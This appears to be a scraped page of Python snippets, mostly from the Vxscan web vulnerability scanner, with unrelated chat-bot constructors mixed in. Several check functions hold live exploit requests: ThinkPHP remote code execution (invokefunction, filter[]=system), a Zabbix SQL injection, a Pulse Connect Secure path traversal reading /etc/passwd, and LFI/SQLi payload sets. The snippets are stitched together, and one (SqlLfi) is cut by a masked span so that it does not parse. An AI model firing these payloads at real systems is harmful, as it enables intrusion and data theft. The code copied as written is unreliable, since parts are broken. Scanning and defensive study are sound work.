示例#1
文件: crawl.py 项目: yxf010/Vxscan
 def __init__(self, host):
     """Initialise empty crawl state bound to ``host``.

     Args:
         host: Target the instance works against; stored unchanged.
     """
     self.host = host
     self.domain = ''
     # Three independent, initially empty lists.
     self.urls, self.js, self.result = [], [], []
     # Project HTTP helper; one client per instance.
     self.req = Requests()
示例#2
 def __init__(self, host):
     """Initialise empty crawl state bound to ``host``.

     Args:
         host: Target the instance works against; stored unchanged.
     """
     self.host = host
     # Four independent, initially empty lists.
     self.links, self.urls, self.js, self.result = [], [], [], []
     # Project HTTP helper; one client per instance.
     self.req = Requests()
示例#3
 def __init__(self, user_id, chat_id, peer_id, max_pred):
     """Store the identifiers for one action context and build its client.

     Args:
         user_id: Stored as ``self.user_id``.
         chat_id: Stored as ``self.chat_id`` and passed to ``Requests``.
         peer_id: Stored as ``self.peer_id`` and passed to ``Requests``.
         max_pred: Stored as ``self.max_pred``.
     """
     print("Actions init")
     self.user_id, self.chat_id, self.peer_id = user_id, chat_id, peer_id
     self.max_pred = max_pred
     self.is_ban_or_kik = False
     # Note the argument order: peer first, then chat.
     self.requests = Requests(peer_id, chat_id)
示例#4
 def __init__(self, ip):
     """Prepare per-target state and a random numeric marker.

     Args:
         ip: Target address; stored as ``self.url``.
     """
     self.url = ip
     self.result = []
     self.timeout = 3
     # One marker per instance, embedded in both command strings below.
     # NOTE(review): presumably the marker is looked for in a response to
     # confirm that the command string was evaluated -- confirm against the
     # methods that use self.win / self.linux.  ``random`` is not a CSPRNG;
     # that is acceptable only because the marker is not a secret.
     marker = random.randint(100000000, 200000000)
     self.random = marker
     self.win = 'set /a {}'.format(marker)
     self.linux = 'echo {}'.format(marker)
     self.req = Requests()
示例#5
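def get_info(url):
    """Report an Apache Solr admin dashboard reachable under ``url``.

    Args:
        url: Base URL of the target; ``/solr/`` is appended to it.

    Returns:
        A finding string containing the probed URL when the response has
        status 200 and its text contains both ``Solr Admin`` and
        ``Dashboard``; otherwise ``None``.
    """
    try:
        req = Requests()
        url = url + '/solr/'
        r = req.get(url)
        # Compare by value: ``is 200`` only worked through CPython's
        # small-integer cache and raises a SyntaxWarning on Python 3.8+.
        if r.status_code == 200 and 'Solr Admin' in r.text and 'Dashboard' in r.text:
            return 'Apache Solr Admin leask: ' + url
    except Exception:
        # Best-effort probe: any request or attribute failure means
        # "no finding".
        pass
    return None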
示例#6
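def check(url, ip, ports, apps):
    """Report an Apache Solr admin dashboard reachable under ``url``.

    Args:
        url: Base URL of the target; ``/solr/`` is appended to it.
        ip: Unused in this function.
        ports: Passed to ``verify`` together with the module-level ``vuln``.
        apps: Passed to ``verify`` together with the module-level ``vuln``.

    Returns:
        ``'Apache Solr Admin leask'`` when ``verify`` allows the probe, the
        response has status 200 and its text contains both ``Solr Admin``
        and ``Dashboard``; otherwise ``None``.
    """
    req = Requests()
    # NOTE(review): verify() presumably gates the probe on the target's
    # fingerprinted ports/apps -- confirm against its definition.
    if verify(vuln, ports, apps):
        try:
            url = url + '/solr/'
            r = req.get(url)
            # Compare by value (``is 200`` relied on CPython int caching) and
            # search the decoded text: on Python 3 ``'str' in r.content``
            # raises TypeError for a bytes body, which the handler below
            # would silently turn into "no finding".
            if r.status_code == 200 and 'Solr Admin' in r.text and 'Dashboard' in r.text:
                return 'Apache Solr Admin leask'
        except Exception:
            # Best-effort probe: failures mean "no finding".
            pass
    return None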
示例#7
    def __init__(self, dbname, apps):
        """Store the scan inputs and reset the per-scan fields.

        Args:
            dbname: Stored as ``self.dbname``.
            apps: Stored as ``self.apps``.
        """
        self.dbname = dbname
        self.apps = apps

        # Four string fields start empty; this constructor assigns no meaning.
        self.notstr = self.notlen = self.goto = self.title = ''
        self.outjson = []

        # Project HTTP helper; one client per instance.
        self.req = Requests()
def check(url, ip, ports, apps):
    """Probe ``url`` for the check this module labels ``thinkphp5_rce_1``.

    The request asks the application to render ``phpinfo`` through the
    ``invokefunction`` route; a finding is reported when the response text
    contains ``PHP Version`` or ``PHP Extension Build``.

    For defenders: the query string below is a stable signature to alert on
    in web-server logs, and a positive result means the target needs a
    patched ThinkPHP release.

    Args:
        url: Base URL of the target.
        ip: Unused in this function.
        ports: Passed to ``verify`` together with the module-level ``vuln``.
        apps: Passed to ``verify`` together with the module-level ``vuln``.

    Returns:
        ``'thinkphp5_rce_1 | ' + url`` on a match, otherwise ``None``.
    """
    req = Requests()
    if not verify(vuln, ports, apps):
        return None
    payload = r"/index.php/?s=/index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
    try:
        resp = req.get(url + payload)
        matched = 'PHP Version' in resp.text or 'PHP Extension Build' in resp.text
        if matched:
            return 'thinkphp5_rce_1 | ' + url
    except Exception:
        # Best-effort probe: failures mean "no finding".
        pass
    return None
示例#9
 def __init__(self, dbname):
     """Store ``dbname`` and reset the per-scan fields.

     Args:
         dbname: Stored as ``self.dbname``.
     """
     self.dbname = dbname
     # Comma-separated extension list, fixed at construction time.
     self.ext = 'asp,php'

     # Four string fields start empty; this constructor assigns no meaning.
     self.notstr = self.notlen = self.goto = self.title = ''
     self.outjson = []

     # Project HTTP helper; one client per instance.
     self.req = Requests()
示例#10
def check(url, ip, ports, apps):
    """Probe ``url`` for the issue this module labels CVE-2016-10134.

    A single GET is sent to ``jsrpc.php`` with a crafted ``profileIdx2``
    value. A finding is reported when the response text contains the marker
    string below or ``SQL error ``.

    For defenders: database error text reaching the client is itself worth
    alerting on, and the ``jsrpc.php`` query string is a usable log
    signature.

    Args:
        url: Base URL of the target.
        ip: Unused in this function.
        ports: Passed to ``verify`` together with the module-level ``vuln``.
        apps: Passed to ``verify`` together with the module-level ``vuln``.

    Returns:
        ``'CVE-2016-10134 zabbix sqli:' + url`` on a match, else ``None``.
    """
    req = Requests()
    if not verify(vuln, ports, apps):
        return None
    payload = r"/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
    try:
        resp = req.get(url + payload)
        # NOTE(review): the hex marker is presumably the (truncated) digest
        # echoed back inside the database error message -- confirm.
        hit = 'ed733b8d10be225eceba344d533586' in resp.text or 'SQL error ' in resp.text
        if hit:
            return 'CVE-2016-10134 zabbix sqli:' + url
    except Exception:
        # Best-effort probe: failures mean "no finding".
        pass
    return None
def check(url, ip, ports, apps):
    """Probe ``url`` for the issue this module labels CVE-2019-11510.

    One GET is sent with a path that traverses out of the
    ``/dana/html5acc/guacamole/`` prefix; a finding is reported when the
    response text contains ``root:x:0:0:root``.

    For defenders: the ``/dana-na/../`` prefix in gateway access logs is a
    signature of this probe, and a positive result means the appliance is
    unpatched.

    Args:
        url: Base URL of the target.
        ip: Unused in this function.
        ports: Passed to ``verify`` together with the module-level ``vuln``.
        apps: Passed to ``verify`` together with the module-level ``vuln``.

    Returns:
        ``'CVE-2019-11510 Pulse Connect Secure File | ' + url`` on a match,
        otherwise ``None``.
    """
    req = Requests()
    if not verify(vuln, ports, apps):
        return None
    payload = r"/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/"
    try:
        resp = req.get(url + payload)
        if 'root:x:0:0:root' in resp.text:
            return 'CVE-2019-11510 Pulse Connect Secure File | ' + url
    except Exception:
        # Best-effort probe: failures mean "no finding".
        pass
    return None
示例#12
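def get_info(url):
    """Report the first candidate path under ``url`` that exposes phpinfo().

    Each entry of the module-level ``path`` is appended to ``url`` and
    fetched. A response counts as a finding when its status is 200 and its
    text contains ``<title>phpinfo()`` or ``php_version``.

    Args:
        url: Base URL of the target.

    Returns:
        ``'phpinfo leaks: ' + url + path_entry`` for the first hit,
        otherwise ``None``.
    """
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code == 200:
                if '<title>phpinfo()' in r.text or 'php_version' in r.text:
                    return 'phpinfo leaks: ' + url + i
    except Exception:
        # Was a bare ``except:``, which also swallowed KeyboardInterrupt and
        # SystemExit and made a running scan impossible to interrupt here.
        # Note that the first failing request still ends the whole loop.
        pass
    return None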
示例#13
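def get_info(url):
    """Report the first candidate path under ``url`` that serves a raw file.

    Each entry of the module-level ``path`` is appended to ``url`` and
    fetched. A response counts as a finding when its status is 200, its text
    contains no ``<html>`` tag, it does not look like a JSON object, and the
    module-level ``verify`` accepts the text.

    Args:
        url: Base URL of the target.

    Returns:
        ``'leaks : ' + url + path_entry`` for the first hit, else ``None``.
    """
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code != 200 or '<html>' in r.text:
                continue
            # Skip JSON-looking bodies (typically an API error object).
            if re.search(r'{"\w+":', r.text):
                continue
            if verify(r.text):
                return 'leaks : ' + url + i
    except Exception:
        # Was a bare ``except:``, which also swallowed KeyboardInterrupt and
        # SystemExit. The first failing request still ends the whole loop.
        pass
    return None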
示例#14
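def get_info(url):
    """Report the first candidate path under ``url`` that serves a raw file.

    Each entry of the module-level ``path`` is appended to ``url`` and
    fetched. A response counts as a finding when its status is 200, its text
    contains no ``<html`` tag, none of the HTML/JSON/status-page markers in
    the regular expression below occur, and the module-level ``verify``
    accepts the text.

    Args:
        url: Base URL of the target.

    Returns:
        ``'leaks : ' + url + path_entry`` for the first hit, else ``None``.
    """
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code != 200 or '<html' in r.text:
                continue
            # Markers of an ordinary page (soft 404, login form, status
            # page) rather than a leaked file.
            if re.search(r'{"\w+":|<head>|<form\s|<div\s|<input\s|<html|</a>|Active connections', r.text):
                continue
            if verify(r.text):
                return 'leaks : ' + url + i
    except Exception:
        # Was a bare ``except:``, which also swallowed KeyboardInterrupt and
        # SystemExit. The first failing request still ends the whole loop.
        pass
    return None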
def check(url, ip, ports, apps):
    """Probe ``url`` for the check this module labels ``thinkphp_5_0_23_rce``.

    A form-encoded POST is sent to ``/index.php?s=captcha`` asking the
    application to echo the module-level ``random_num``; a finding is
    reported when that value appears in the response text.

    For defenders: a POST body that sets ``_method=__construct`` together
    with ``filter[]`` is a signature to alert on or block.

    Args:
        url: Base URL of the target.
        ip: Unused in this function.
        ports: Passed to ``verify`` together with the module-level ``vuln``.
        apps: Passed to ``verify`` together with the module-level ``vuln``.

    Returns:
        ``'thinkphp_5_0_23_rce | ' + url`` on a match, otherwise ``None``.
    """
    req = Requests()
    if not verify(vuln, ports, apps):
        return None
    payload = r'_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "{}"'.format(random_num)
    try:
        form_headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        resp = req.request(url + '/index.php?s=captcha', 'post', data=payload, headers=form_headers)
        # ``in`` requires random_num to be a str here.
        if random_num in resp.text:
            return 'thinkphp_5_0_23_rce | ' + url
    except Exception:
        # Best-effort probe: failures mean "no finding".
        pass
    return None
示例#16
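def check(url, ip, ports, apps):
    """Probe ``url`` for an open redirect through a ``//host`` path.

    ``//www.example.com`` is appended to ``url``; a finding is reported when
    the response is a redirect whose ``Location`` header contains
    ``www.example.com``.

    Args:
        url: Base URL of the target.
        ip: Unused in this function.
        ports: Passed to ``verify`` together with the module-level ``vuln``.
        apps: Passed to ``verify`` together with the module-level ``vuln``.

    Returns:
        The finding string (Chinese for "Django < 2.0.8 arbitrary URL
        redirect vulnerability") on a match, otherwise ``None``.
    """
    req = Requests()
    if verify(vuln, ports, apps):
        payload = "//www.example.com"
        try:
            r = req.get(url + payload)
            # A redirect without a Location header used to raise TypeError
            # (``in None``) and depend on the handler below; treat a missing
            # header as empty instead.
            # NOTE(review): r.is_redirect is only meaningful if Requests.get
            # does not follow redirects itself -- confirm.
            if r.is_redirect and 'www.example.com' in (r.headers.get('Location') or ''):
                return 'Django < 2.0.8 任意URL跳转漏洞'
        except Exception:
            # Best-effort probe: failures mean "no finding".
            pass
    return None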
示例#17
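def checkwaf(url):
    """Identify a WAF in front of ``url`` from its responses.

    The plain URL is fetched first. If the module-level ``verify`` reports
    ``'NoWAF'`` for it, each entry of the module-level ``payload`` is
    appended to the URL in turn until one response is attributed to a WAF.

    Args:
        url: URL of the target.

    Returns:
        Whatever ``verify`` returned for the first response it attributed to
        a WAF, or ``'NoWAF'`` when none was identified or a request failed.
    """
    try:
        req = Requests()
        r = req.get(url)
        # Only the first 10000 characters of the body are inspected.
        result = verify(r.headers, r.text[:10000])
        if result == 'NoWAF':
            for i in payload:
                r = req.get(url + i)
                result = verify(r.headers, r.text[:10000])
                # Stop at the first detection. Without this, a later payload
                # that is not blocked overwrote an earlier positive result,
                # so only the last payload's verdict was ever returned.
                if result != 'NoWAF':
                    break
        return result
    except Exception:
        # Was a bare ``except:``, which also swallowed KeyboardInterrupt and
        # SystemExit.
        return 'NoWAF'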
示例#18
    def __init__(self, update_object):
        """Build the controller for one incoming update and dispatch it.

        Args:
            update_object: Mapping read here for the keys ``'from_id'``,
                ``'text'`` and ``'peer_id'``; a missing key raises KeyError.
        """
        print("Controller init")
        self.u = update_object

        # Resolve the sender through the project helper find_user().
        self.user = find_user(update_object['from_id'])
        self.text = update_object['text']

        self.command = self.payloadParse()
        self.r = Requests(update_object['peer_id'])
        # NOTE(review): payloadParse() is called a second time and its return
        # value is discarded -- redundant unless it has side effects; confirm.
        self.payloadParse()

        # The constructor itself dispatches on the user's level.
        # NOTE(review): self.text comes straight from the update; whether it
        # is validated before switchLevel() acts on it is not visible here.
        self.switchLevel(self.user.level)
示例#19
def robots(url):
    """Collect the path-like strings listed in a site's ``robots.txt``.

    Args:
        url: Base URL of the target; ``/robots.txt`` is appended to it.

    Returns:
        A de-duplicated list (order not defined) of the matches when the
        file is served with status 200, is not an HTML page and contains at
        least one match; otherwise ``None``.
    """
    found = ''
    try:
        client = Requests()
        resp = client.get(url + '/robots.txt')
        # An HTML body here is usually a soft 404, not a robots file.
        is_plain = resp.status_code == 200 and '<html' not in resp.text
        if is_plain:
            found = re.findall(r"/[\w\?\.=/]+/?", resp.text)
        if found:
            return list(set(found))
    except (UnboundLocalError, AttributeError):
        # Expected failure modes are ignored without logging.
        pass
    except Exception as e:
        logging.exception(e)
    return None
示例#20
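def get_info(url):
    """Report the first candidate path under ``url`` that looks like a login page.

    Each entry of the module-level ``path`` is appended to ``url`` and
    fetched. A 200 response counts when its text matches the keyword regex
    below and the module-level ``verify`` accepts it; a 403 response is
    reported immediately as a possible login page.

    Args:
        url: Base URL of the target.

    Returns:
        ``'Admin_Page : ' + url + path_entry`` or
        ``'May be the login page : ' + url + path_entry`` for the first hit,
        otherwise ``None``.
    """
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code == 200:
                if re.search(
                        r'admin|login|manager|登陆|管理|后台|type="password"|入口|admin_passwd',
                        r.text, re.S):
                    if verify(r.text):
                        return 'Admin_Page : ' + url + i
            elif r.status_code == 403:
                # NOTE(review): a 403 on the first candidate path ends the
                # search, so a blanket 403 policy yields a finding for
                # whatever path happens to be first.
                return 'May be the login page : ' + url + i

    except Exception:
        # Was a bare ``except:``, which also swallowed KeyboardInterrupt and
        # SystemExit. The first failing request still ends the whole loop.
        pass
    return None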
示例#21
文件: js_leaks.py 项目: yxf010/Vxscan
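class JsLeaks():
    """Scan fetched JavaScript (or any text resource) for leaked data.

    Findings are accumulated in ``self.result`` as
    ``'<url> Leaks: <match>'`` strings. They can contain credentials copied
    verbatim from the scanned file, so the list should be stored and shared
    as sensitive data.
    """

    def __init__(self):
        self.result = []
        self.req = Requests()

    def pool(self, urls):
        """Run :meth:`get_js` over ``urls`` on a thread pool.

        Args:
            urls: Iterable of URLs to fetch and scan.

        Returns:
            ``self.result`` with whatever findings were collected.
        """
        try:
            with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
                result = {executor.submit(self.get_js, i): i for i in urls}
                # The 3 second budget covers the whole batch, not each URL.
                for future in concurrent.futures.as_completed(result, timeout=3):
                    future.result()
        except (EOFError, concurrent.futures.TimeoutError):
            # Public alias of the class the private ``_base`` module exposes.
            pass
        except Exception as e:
            logging.exception(e)

        return self.result

    def verify(self, text):
        """Return True only if every string in ``text`` matches the noise pattern.

        The pattern covers ``0x.``-prefixed dotted numbers, anything
        containing ``google``, image file names and ``n.n.0.0`` style
        strings. An empty ``text`` yields True.

        NOTE(review): get_js() records a pattern's matches only when this
        returns True, i.e. when all of them look like noise. That reads as
        inverted; behaviour is kept as-is here -- confirm the intent.
        """
        return all(
            re.search(r'^0\d\.\d+\.\d+\.\d+|google|png$|gif$|jpg$|\b\d+\.\d+\.0\.0', i)
            for i in text
        )

    def get_js(self, url):
        """Fetch ``url`` and append pattern matches to ``self.result``.

        Only the first 100000 characters of the response text are searched.

        Args:
            url: Resource to fetch and scan.
        """
        r = self.req.get(url)
        regex = (
            # URLs
            r'\b(?:http:|https:)(?:[\w/\.]+)?(?:[a-zA-Z0-9_\-\.]{1,})\.(?:php|asp|ashx|jspx|aspx|jsp|json|action|html|txt|xml|do|js)\b',
            r'([a-zA-Z0-9_\-]{1,}\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\?[^\"|\']{0,}|))',
            # E-mail addresses
            r'[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+',
            # Leaked tokens or passwords,
            # e.g. token = xxxxxxxx, or "apikey" : "xssss"
            r'\b(?:secret|secret_key|token|secret_token|auth_token|access_token|username|password|aws_access_key_id|aws_secret_access_key|secretkey|authtoken|accesstoken|access-token|authkey|client_secret|bucket|extr|HEROKU_API_KEY|SF_USERNAME|PT_TOKEN|id_dsa|clientsecret|client-secret|encryption-key|pass|encryption_key|encryptionkey|secretkey|secret-key|bearer|JEKYLL_GITHUB_TOKEN|HOMEBREW_GITHUB_API_TOKEN|api_key|api_secret_key|api-key|private_key|client_key|client_id|sshkey|ssh_key|ssh-key|privatekey|DB_USERNAME|oauth_token|irc_pass|dbpasswd|xoxa-2|xoxrprivate-key|private_key|consumer_key|consumer_secret|access_token_secret|SLACK_BOT_TOKEN|slack_api_token|api_token|ConsumerKey|ConsumerSecret|SESSION_TOKEN|session_key|session_secret|slack_token|slack_secret_token|bot_access_token|passwd|api|eid|sid|qid|api_key|apikey|userid|user_id|user-id|uid|private|BDUSS|stoken|imei|imsi|nickname|appid|uname)["\s]*(?::|=|=:|=>)["\s]*[a-z0-9A-Z]{8,64}',
            # Standalone runs of 32 hex characters
            r'(?:[^a-fA-F\d]|\b)(?:[a-fA-F\d]{32})(?:[^a-fA-F\d]|\b)',
            # Quoted paths such as "/task/router"
            r'"(/\w{3,}/\w{3,})"',
            # IPv4 addresses
            r'\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b',
            # Cloud storage / CDN host names
            r'[\w]+\.cloudfront\.net',
            r'[\w\-.]+\.appspot\.com',
            r'[\w\-.]*s3[\w\-.]*\.?amazonaws\.com\/?[\w\-.]*',
            r'([\w\-.]*\.?digitaloceanspaces\.com\/?[\w\-.]*)',
            r'(storage\.cloud\.google\.com\/[\w\-.]+)',
            r'([\w\-.]*\.?storage.googleapis.com\/?[\w\-.]*)',
            # Mobile phone numbers.  The trailing comma was missing, so this
            # pattern and the domain pattern below were concatenated into one
            # expression that could match neither on its own.
            r'(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}',
            # Domain names
            r'((?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+(?:biz|cc|club|cn|com|co|edu|fun|group|info|ink|kim|link|live|ltd|mobi|net|online|org|pro|pub|red|ren|shop|site|store|tech|top|tv|vip|wang|wiki|work|xin|xyz|me))',
        )
        body = r.text[:100000]
        for pattern in regex:
            # re.findall() always returns a list, so no None check is needed.
            text = re.findall(pattern, body, re.M | re.I)
            if self.verify(text):
                self.result.extend([url + ' Leaks: ' + x for x in text])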
示例#22
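def ipinfo(host):
    """Look up historical IP addresses for a domain on viewdns.info.

    Nothing is requested when ``host`` already contains a dotted-quad
    pattern.

    Args:
        host: Domain name (or IP address) of the target. It is sent to a
            third-party service as part of the lookup URL.

    Returns:
        List of the addresses scraped from the history table for which
        ``iscdn`` returned a truthy value; empty when ``host`` looks like an
        IP address, nothing matched or the request failed.
    """
    out = []
    if re.search(r'\d+\.\d+\.\d+\.\d+', host):
        return out
    req = Requests()
    try:
        r = req.get(
            'https://viewdns.info/iphistory/?domain={}'.format(host))
        result = re.findall(
            r'(?<=<tr><td>)\d+\.\d+\.\d+\.\d+(?=</td><td>)', r.text,
            re.S | re.I)
        for i in result:
            # NOTE(review): iscdn() is used as a keep-filter here; confirm
            # whether a truthy result means "is" or "is not" a CDN address.
            if iscdn(i):
                out.append(i)
    except Exception:
        # Was a bare ``except:``, which also swallowed KeyboardInterrupt and
        # SystemExit. Addresses collected before the failure are kept.
        pass

    return out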
示例#23
def web_info(url):
    """Gather address, WAF, fingerprint and OS information for ``url``.

    Args:
        url: URL of the target; surrounding ``/`` characters are stripped
            before it is requested.

    Returns:
        A 3-tuple ``(data, apps, title)``: ``data`` maps the parsed host to
        a dict with the keys ``WAF``, ``Ipaddr``, ``Address``, ``Webinfo``
        and ``OS``; ``apps`` and ``title`` are read from the page
        information and are ``None`` when it is empty.
    """
    host = parse_host(url)
    ipaddr = parse_ip(host)
    url = url.strip('/')
    address = geoip(ipaddr)
    wafresult = checkwaf(url)
    req = Requests()
    # noinspection PyBroadException
    try:
        resp = req.get(url)
        # Decode the body with the detected charset, not the declared one.
        resp.encoding = chardet.detect(resp.content).get('encoding')
        webinfo = WebPage(resp.url, resp.text, resp.headers).info()
    except Exception as e:
        logging.exception(e)
        webinfo = {}

    if not webinfo:
        # No page information: the WAF verdict is replaced by the string
        # 'None' as well.
        webinfo = {}
        wafresult = 'None'
    else:
        report = (
            ('title: {}\n', 'title'),
            ('Fingerprint: {}\n', 'apps'),
            ('Server: {}\n', 'server'),
        )
        for template, key in report:
            console('Webinfo', host, template.format(webinfo.get(key)))
        console('Webinfo', host, 'WAF: {}\n'.format(wafresult))

    # OS detection runs only for hosts for which iscdn() is truthy.
    osname = osdetect(host) if iscdn(host) else None

    details = {
        'WAF': wafresult,
        'Ipaddr': ipaddr,
        'Address': address,
        'Webinfo': webinfo,
        'OS': osname,
    }
    data = {host: details}

    return data, webinfo.get('apps'), webinfo.get('title')
示例#24
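def checkwaf(url):
    """Identify a WAF in front of ``url`` from its responses.

    The plain URL is fetched first, then each entry of the module-level
    ``payload`` is appended to it in turn, until the module-level ``verify``
    attributes a response to a WAF.

    Args:
        url: URL of the target.

    Returns:
        The value ``verify`` returned for the first response attributed to a
        WAF; otherwise ``'CDN IP'`` when ``iscdn`` is falsy for the parsed
        host, else ``'NoWAF'``.
    """
    try:
        req = Requests()
        r = req.get(url)
        # Only the first 10000 characters of the body are inspected.
        result = verify(r.headers, r.text[:10000])
        # A WAF recognised on the baseline request is returned directly.
        # Previously this case fell through to the CDN check and the
        # detection was reported as 'CDN IP' or 'NoWAF'.
        if result != 'NoWAF':
            return result
        for i in payload:
            r = req.get(url + i)
            result = verify(r.headers, r.text[:10000])
            if result != 'NoWAF':
                return result
    except UnboundLocalError:
        pass
    except Exception as e:
        logging.exception(e)
    host = parse_host(url)

    # A falsy iscdn() result is what this function reports as 'CDN IP'.
    if not iscdn(host):
        return 'CDN IP'

    return 'NoWAF'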
示例#25
def verify_https(url):
    """Decide whether a host should be addressed over https or http.

    https is tried first. If that answers with a 301 or 302, the ``www.``
    variant is tried and returned when it answers 200. If the https attempt
    raises, plain http is tried.

    Args:
        url: Host name, or a URL from which the network location (else the
            path) is taken.

    Returns:
        The URL with the scheme that worked, or ``None`` when both attempts
        raised.
    """
    req = Requests()
    parts = parse.urlparse(url)
    # Reduce the input to a bare host: netloc when a scheme was given,
    # otherwise whatever landed in the path component.
    if parts.netloc:
        url = parts.netloc
    elif parts.path:
        url = parts.path
    secure = 'https://' + url
    # noinspection PyBroadException
    try:
        r = req.get(secure)
        # Raises AttributeError when r has no status_code, which sends
        # control to the http fallback below.
        getattr(r, 'status_code')
        if r.status_code in (301, 302):
            secure_www = 'https://' + 'www.' + url
            r = req.get(secure_www)
            if r.status_code == 200:
                return secure_www
        return secure
    except Exception:
        # Any https failure falls back to cleartext http, so later requests
        # to this host are unencrypted.
        # noinspection PyBroadException
        try:
            plain = 'http://' + url
            req.get(plain)
            return plain
        except Exception:
            pass
示例#26
def verify_https(url):
    """Decide whether a host should be addressed over https or http.

    A URL that already carries a scheme is returned unchanged as soon as a
    request to it does not raise. Otherwise https is tried first and http is
    the fallback; the chosen URL is also printed through ``console``.

    Args:
        url: Host name or full URL of the target.

    Returns:
        The URL to use, or ``None`` when no attempt succeeded.
    """
    req = Requests()
    # noinspection PyBroadException
    if '://' in url:
        try:
            # The response is not inspected: not raising is enough.
            req.get(url)
            return url
        except Exception:
            pass
    host = parse_host(url)
    parts = parse.urlparse(url)
    # Reduce the input to a bare host: netloc when a scheme was given,
    # otherwise whatever landed in the path component.
    if parts.netloc:
        url = parts.netloc
    elif parts.path:
        url = parts.path
    secure = 'https://' + url
    # noinspection PyBroadException
    try:
        r = req.get(secure)
        # Raises AttributeError when r has no status_code, which is the
        # only failure that triggers the http fallback below.
        getattr(r, 'status_code')
        console('Verify', host, secure + '\n')
        return secure
    except AttributeError:
        # Falls back to cleartext http, so later requests to this host are
        # unencrypted.
        # noinspection PyBroadException
        try:
            plain = 'http://' + url
            req.get(plain)
            console('Verify', host, plain + '\n')
            return plain
        except Exception:
            pass
    except Exception as e:
        logging.exception(e)
    except Exception as e:
        logging.exception(e)
示例#27
class SqlLfi():
    """Checks parameterised URLs for SQL error messages and file inclusion.

    Findings are appended to ``self.result`` as strings.
    """
    def __init__(self):
        self.result = []
        self.req = Requests()
    
    def sqli(self, qurl):
        """Test one URL; append at most one finding per category.

        NOTE(review): this listing is incomplete. The hosting page replaced
        part of the method with ``******`` (end of the LFI_payload literal,
        the ``try:`` line and the SQL-injection loop), so the code below does
        not parse as shown and that part cannot be documented from here.
        """
        # Strings used by the (missing) SQL-injection loop.
        payload = {
            "'", "%2527", "')", " AnD 7738=8291"
        }
        # Each entry is '<value to substitute>|<regex expected in the response>'.
        LFI_payload = {'../../../../etc/passwd|root:x', '../../../../etc/group|root:x', 'random.php|Failed opening',
                       'file://c:/windows/win.ini|drivers', '/proc/self/environ|USER='******'{} SQLi:{}'.format(dbms, qurl)
                        self.result.append(result)
                        raise Getoutofloop
            for i in LFI_payload:
                url = ''
                lfi, pattern = i.split('|')
                # Replace a trailing 'name.ext' value, else a trailing word.
                if re.search(r'=\w+\.\w{3}$', qurl):
                    url = re.sub(r'\w+\.\w{3}$', lfi, qurl)
                # NOTE(review): this pattern is not a raw string, so '\w' is
                # an invalid escape sequence in newer Python versions.
                elif re.search('=\w+', qurl):
                    url = re.sub(r'\w+$', lfi, qurl)
                # NOTE(review): url is still '' when neither branch matched.
                r = self.req.get(url)
                if re.search(pattern, r.text, re.S):
                    self.result.append('LFI: {}'.format(url))
                    break
        # Bare except: every error, including KeyboardInterrupt, is dropped.
        except:
            pass
    
    def pool(self, urls):
        """Run sqli() over the de-duplicated ``urls`` on 30 worker threads.

        Returns ``self.result``. The iterator returned by executor.map() is
        never consumed, so exceptions raised inside sqli() are not re-raised.
        """
        host = dedup_url(urls)
        with concurrent.futures.ThreadPoolExecutor(
            max_workers=30) as executor:
            executor.map(self.sqli, host)
        return self.result
示例#28
文件: web_info.py 项目: yxf010/Vxscan
def web_info(url):
    """Gather address, WAF, fingerprint, OS and passive-DNS data for ``url``.

    Args:
        url: URL of the target; surrounding ``/`` characters are stripped
            before it is requested.

    Returns:
        A 2-tuple ``(data, apps)``: ``data`` maps the parsed host to a dict
        with the keys ``WAF``, ``Ipaddr``, ``Address``, ``Webinfo`` and
        ``OS``; ``apps`` is read from the page information and is ``None``
        when it is absent.
    """
    host = parse_host(url)
    ipaddr = parse_ip(host)
    url = url.strip('/')
    address = geoip(ipaddr)
    wafresult = checkwaf(url)
    req = Requests()
    try:
        resp = req.get(url)
        # Decode the body with the detected charset, not the declared one.
        resp.encoding = chardet.detect(resp.content).get('encoding')
        webinfo = WebPage(resp.url, resp.text, resp.headers).info()
    except Exception:
        # The failure is not logged; the page information is just empty.
        webinfo = {}

    if not webinfo:
        # No page information: the WAF verdict is replaced by the string
        # 'None' as well.
        webinfo = {}
        wafresult = 'None'
    else:
        report = (
            ('Title: {}\n', 'title'),
            ('Fingerprint: {}\n', 'apps'),
            ('Server: {}\n', 'server'),
        )
        for template, key in report:
            console('Webinfo', host, template.format(webinfo.get(key)))
        console('Webinfo', host, 'WAF: {}\n'.format(wafresult))

    # OS detection runs only for hosts for which iscdn() is truthy.
    osname = osdetect(host) if iscdn(host) else None

    # NOTE(review): judging by their names, both lookups send the host name
    # to external services -- confirm before scanning hosts whose names must
    # not be disclosed to third parties.
    pdns = virustotal(host)
    reverseip = reverse_domain(host)
    webinfo.update({"pdns": pdns, "reverseip": reverseip})

    details = {
        'WAF': wafresult,
        'Ipaddr': ipaddr,
        'Address': address,
        'Webinfo': webinfo,
        'OS': osname,
    }
    data = {host: details}
    return data, webinfo.get('apps')
示例#29
    def __init__(self, dbname, apps, host, title):
        """Store the scan inputs and build the shuffled list of URLs.

        Args:
            dbname: Stored as ``self.dbname``.
            apps: Stored as ``self.apps``.
            host: Stored as ``self.host`` and passed to ``self.get_urls``.
            title: Stored as ``self.title``.
        """
        self.dbname, self.apps, self.title = dbname, apps, title
        self.headers = get_ua()
